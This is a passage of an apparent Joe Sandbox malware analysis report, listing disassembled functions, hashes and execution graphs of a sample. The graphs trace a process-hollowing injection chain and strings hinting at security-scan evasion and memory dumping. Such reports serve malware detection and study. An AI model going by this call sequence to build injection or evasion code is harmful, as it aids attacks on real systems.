                                                                                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                              Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                              • API String ID: 1646373207-3105848591
                                                                                              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                              • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                              • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                              Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __fileno.LIBCMT ref: 0040C77C
                                                                                              • __locking.LIBCMT ref: 0040C791
                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                              • String ID:
                                                                                              • API String ID: 2395185920-0
                                                                                              • Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                              • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                              • Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
                                                                                              • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                              Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _fseek_malloc_memset
                                                                                              • String ID:
                                                                                              • API String ID: 208892515-0
                                                                                              • Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                              • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                              • Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                              • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                              Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                              • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                              • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                              • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                              Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                              • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                              • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.5%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:171
                                                                                              Total number of Limit Nodes:15
                                                                                              execution_graph 27280 31cc35c timeSetEvent 27281 31a1a8f 27282 31a1b6c 27281->27282 27283 31a1aa1 27281->27283 27284 31a1aa7 27282->27284 27285 31a16e8 27282->27285 27283->27284 27287 31a1b13 Sleep 27283->27287 27288 31a1ab0 27284->27288 27291 31a1b4b Sleep 27284->27291 27295 31a1b81 27284->27295 27286 31a1c66 27285->27286 27298 31a1644 27285->27298 27287->27284 27290 31a1b2d Sleep 27287->27290 27290->27283 27293 31a1b61 Sleep 27291->27293 27291->27295 27293->27284 27294 31a170d 27296 31a1c00 VirtualFree 27295->27296 27297 31a1ba4 27295->27297 27299 31a1681 VirtualFree 27298->27299 27300 31a164d 27298->27300 27299->27294 27300->27299 27301 31a164f Sleep 27300->27301 27302 31a1664 27301->27302 27302->27299 27303 31a1668 Sleep 27302->27303 27303->27300 27304 31a656c 27305 31a6577 27304->27305 27308 31a4198 27305->27308 27307 31a65b1 27309 31a41de 27308->27309 27310 31a425c 27309->27310 27320 31a4130 27309->27320 27310->27307 27312 31a4419 27310->27312 27315 31a442a 27310->27315 27325 31a435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 27312->27325 27314 31a4423 27314->27315 27316 31a446f FreeLibrary 27315->27316 27317 31a4493 27315->27317 27316->27315 27318 31a449c 27317->27318 27319 31a44a2 ExitProcess 27317->27319 27318->27319 27321 31a4140 27320->27321 27322 31a4173 27320->27322 27321->27322 27326 31a5868 27321->27326 27330 31a15cc 27321->27330 27322->27310 27325->27314 27327 31a5878 GetModuleFileNameA 27326->27327 27329 31a5894 27326->27329 27334 31a5acc GetModuleFileNameA RegOpenKeyExA 27327->27334 27329->27321 27353 31a1560 27330->27353 27332 31a15d4 VirtualAlloc 27333 31a15eb 27332->27333 27333->27321 27335 31a5b4f 27334->27335 27336 31a5b0f RegOpenKeyExA 27334->27336 27352 31a5908 6 API calls 27335->27352 27336->27335 27337 31a5b2d RegOpenKeyExA 27336->27337 27337->27335 27339 31a5bd8 lstrcpyn GetThreadLocale GetLocaleInfoA 27337->27339 27341 31a5c0f 27339->27341 27342 31a5cf2 27339->27342 27340 31a5b74 RegQueryValueExA 27343 31a5bb6 RegCloseKey 27340->27343 27344 31a5b94 RegQueryValueExA 27340->27344 27341->27342 27345 31a5c1f lstrlen 27341->27345 27342->27329 27343->27329 27343->27339 27344->27343 27346 31a5bb2 27344->27346 27347 31a5c37 27345->27347 27346->27343 27347->27342 27348 31a5c5c lstrcpyn LoadLibraryExA 27347->27348 27349 31a5c84 27347->27349 27348->27349 27349->27342 27350 31a5c8e lstrcpyn LoadLibraryExA 27349->27350 27350->27342 27351 31a5cc0 lstrcpyn LoadLibraryExA 27350->27351 27351->27342 27352->27340 27354 31a1500 27353->27354 27354->27332 27355 31cc350 27358 31bf7c8 27355->27358 27359 31bf7d0 27358->27359 27359->27359 29270 31b88b8 LoadLibraryW 27359->29270 27361 31bf7f1 27362 31bf7f6 27361->27362 27363 31bf806 27362->27363 27364 31bf81b 27363->27364 27365 31bf80a 27363->27365 27367 31a4530 8 API calls 27364->27367 29284 31a4530 27365->29284 27368 31bf819 27367->27368 29275 31a4860 27368->29275 29290 31b8274 29270->29290 29272 31b88f1 29298 31b7d78 29272->29298 29276 31a4871 29275->29276 29277 31a48ae 29276->29277 29278 31a4897 29276->29278 29280 31a45a0 8 API calls 29277->29280 29279 31a4bcc 8 API calls 29278->29279 29282 31a48a4 29279->29282 29280->29282 29281 31a48df 29282->29281 29283 31a4530 8 API calls 29282->29283 29283->29281 29285 31a4534 29284->29285 29288 31a4544 29284->29288 29287 31a45a0 8 API calls 29285->29287 29285->29288 29286 31a4572 29286->27368 29287->29288 29288->29286 29289 31a2c2c 8 API calls 29288->29289 29289->29286 29291 31a4530 8 API calls 29290->29291 29292 31b8299 29291->29292 29309 31b798c 29292->29309 29294 31b82a6 29295 31b82c6 GetProcAddress GetProcAddress 29294->29295 29313 31a4500 29295->29313 29299 31a4530 8 API calls 29298->29299 29300 31b7d9d 29299->29300 29301 31b798c 8 API calls 29300->29301 29302 31b7daa 29301->29302 29350 31b81cc 29302->29350 29305 31b8274 10 API calls 29306 31b7dd3 NtWriteVirtualMemory 29305->29306 29307 31a4500 8 API calls 29306->29307 29308 31b7e0c FreeLibrary 29307->29308 29308->27361 29310 31b799d 29309->29310 29317 31a4bcc 29310->29317 29312 31b79ad 29312->29294 29315 31a4506 29313->29315 29314 31a452c 29314->29272 29315->29314 29316 31a2c2c 8 API calls 29315->29316 29316->29315 29318 31a4bd9 29317->29318 29322 31a4c09 29317->29322 29320 31a4be5 29318->29320 29323 31a45a0 29318->29323 29320->29312 29328 31a44dc 29322->29328 29324 31a45c8 29323->29324 29325 31a45a4 29323->29325 29324->29322 29332 31a2c10 29325->29332 29327 31a45b1 29327->29322 29329 31a44fd 29328->29329 29330 31a44e2 29328->29330 29329->29320 29330->29329 29341 31a2c2c 29330->29341 29333 31a2c14 29332->29333 29333->29327 29334 31a2d19 29333->29334 29335 31a2c1e 29333->29335 29339 31a6520 TlsGetValue 29333->29339 29340 31a2ce8 7 API calls 29334->29340 29335->29327 29338 31a2d3a 29338->29327 29339->29334 29340->29338 29342 31a2c3a 29341->29342 29343 31a2c30 29341->29343 29342->29329 29343->29342 29344 31a2d19 29343->29344 29348 31a6520 TlsGetValue 29343->29348 29349 31a2ce8 7 API calls 29344->29349 29347 31a2d3a 29347->29329 29348->29344 29349->29347 29351 31a4530 8 API calls 29350->29351 29352 31b81ef 29351->29352 29353 31b798c 8 API calls 29352->29353 29354 31b81fc 29353->29354 29355 31b8274 10 API calls 29354->29355 29356 31b8215 GetModuleHandleA 29355->29356 29357 31a44dc 8 API calls 29356->29357 29358 31b7dcd 29357->29358 29358->29305 29359 31a1727 29360 31a1968 29359->29360 29361 31a173c 29359->29361 29362 31a1938 29360->29362 29363 31a1a80 29360->29363 29370 31a17cb Sleep 29361->29370 29372 31a174e 29361->29372 29369 31a1947 Sleep 29362->29369 29376 31a1986 29362->29376 29364 31a1a89 29363->29364 29365 31a1684 VirtualAlloc 29363->29365 29367 31a16bf 29365->29367 29368 31a16af 29365->29368 29366 31a175d 29371 31a1644 2 API calls 29368->29371 29374 31a195d Sleep 29369->29374 29369->29376 29370->29372 29375 31a17e4 Sleep 29370->29375 29371->29367 29372->29366 29373 31a182c 29372->29373 29377 31a180a Sleep 29372->29377 29381 31a15cc VirtualAlloc 29373->29381 29382 31a1838 29373->29382 29374->29362 29375->29361 29378 31a15cc VirtualAlloc 29376->29378 29380 31a19a4 29376->29380 29377->29373 29379 31a1820 Sleep 29377->29379 29378->29380 29379->29372 29381->29382

                                                                                              Executed Functions

                                                                                              Function 031B8D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 6026 31b8d70-31b8d73 6027 31b8d78-31b8d7d 6026->6027 6027->6027 6028 31b8d7f-31b8e66 call 31a4990 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 6027->6028 6059 31b8e6c-31b8f47 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 6028->6059 6060 31ba8b7-31ba921 call 31a4500 * 2 call 31a4c60 call 31a4500 call 31a44dc call 31a4500 * 2 6028->6060 6059->6060 6103 31b8f4d-31b9275 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a30d4 * 2 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4de0 call 31a4df0 call 31b8788 6059->6103 6212 31b92e8-31b9609 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a2ee0 call 31a2f08 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 GetThreadContext 6103->6212 6213 31b9277-31b92e3 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 6103->6213 6212->6060 6321 31b960f-31b9872 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b8400 6212->6321 6213->6212 6394 31b9878-31b99e1 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b8670 6321->6394 6395 31b9b7f-31b9beb call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 6321->6395 6485 31b9a0b-31b9a77 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 6394->6485 6486 31b99e3-31b9a09 call 31b7a2c 6394->6486 6422 31b9bf0-31b9d70 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b7a2c 6395->6422 6422->6060 6526 31b9d76-31b9e6f call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b8c80 6422->6526 6493 31b9a7c-31b9b73 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b7a2c 6485->6493 6486->6493 6565 31b9b78-31b9b7d 6493->6565 6577 31b9ec3-31ba61b call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b7d78 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b7d78 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 SetThreadContext NtResumeThread call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a2c2c call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b894c * 3 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 6526->6577 6578 31b9e71-31b9ebe call 31b8b78 call 31b8b6c 6526->6578 6565->6422 6803 31ba620-31ba8b2 call 31b894c * 2 call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c * 5 call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31b8080 call 31b894c * 2 6577->6803 6578->6577 6803->6060
                                                                                              APIs
                                                                                                • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                                • Part of subcall function 031B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031B8814
                                                                                              • GetThreadContext.KERNEL32(032273D4,03227424,ScanString,032273A8,031BA93C,UacInitialize,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,UacInitialize,032273A8), ref: 031B9602
                                                                                                • Part of subcall function 031B8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B8471
                                                                                                • Part of subcall function 031B8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 031B86D5
                                                                                                • Part of subcall function 031B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
                                                                                                • Part of subcall function 031B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
                                                                                              • SetThreadContext.KERNEL32(032273D4,03227424,ScanBuffer,032273A8,031BA93C,ScanString,032273A8,031BA93C,Initialize,032273A8,031BA93C,032273D0,032274C0,032274FC,00000004,03227500), ref: 031BA317
                                                                                              • NtResumeThread.NTDLL(032273D4,00000000), ref: 031BA324
                                                                                                • Part of subcall function 031B894C: LoadLibraryW.KERNEL32(?,?), ref: 031B8960
                                                                                                • Part of subcall function 031B894C: GetProcAddress.KERNEL32(03227394,BCryptVerifySignature), ref: 031B897A
                                                                                                • Part of subcall function 031B894C: FreeLibrary.KERNEL32(03227394,03227394,BCryptVerifySignature,bcrypt,?,032273D4,00000000,032273A8,031BA587,ScanString,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,Initialize), ref: 031B89B6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                              • API String ID: 2388221946-51457883
                                                                                              • Opcode ID: ea155c44fefa12e9cb510e333dceb1d1c72035661fdae7aeb3f290cf497ee968
                                                                                              • Instruction ID: 57ca3a4bd5727792ced5c80215504b909d114afb7b235342262ee6cf0599ba3e
                                                                                              • Opcode Fuzzy Hash: ea155c44fefa12e9cb510e333dceb1d1c72035661fdae7aeb3f290cf497ee968
                                                                                              • Instruction Fuzzy Hash: E8E2E93DA04A589FCB11EB69DC80ACE73B9AF9C601F5041A1E058AF315DF70EE869F51
                                                                                              Function 031B8D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 6881 31b8d6e-31b8d73 6883 31b8d78-31b8d7d 6881->6883 6883->6883 6884 31b8d7f-31b8e66 call 31a4990 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 6883->6884 6915 31b8e6c-31b8f47 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 6884->6915 6916 31ba8b7-31ba921 call 31a4500 * 2 call 31a4c60 call 31a4500 call 31a44dc call 31a4500 * 2 6884->6916 6915->6916 6959 31b8f4d-31b9275 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a30d4 * 2 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4de0 call 31a4df0 call 31b8788 6915->6959 7068 31b92e8-31b9609 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a2ee0 call 31a2f08 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 GetThreadContext 6959->7068 7069 31b9277-31b92e3 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 6959->7069 7068->6916 7177 31b960f-31b9872 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b8400 7068->7177 7069->7068 7250 31b9878-31b99e1 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b8670 7177->7250 7251 31b9b7f-31b9beb call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 7177->7251 7341 31b9a0b-31b9a77 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 7250->7341 7342 31b99e3-31b9a09 call 31b7a2c 7250->7342 7278 31b9bf0-31b9d70 call 31a4860 call 31a49a0 call 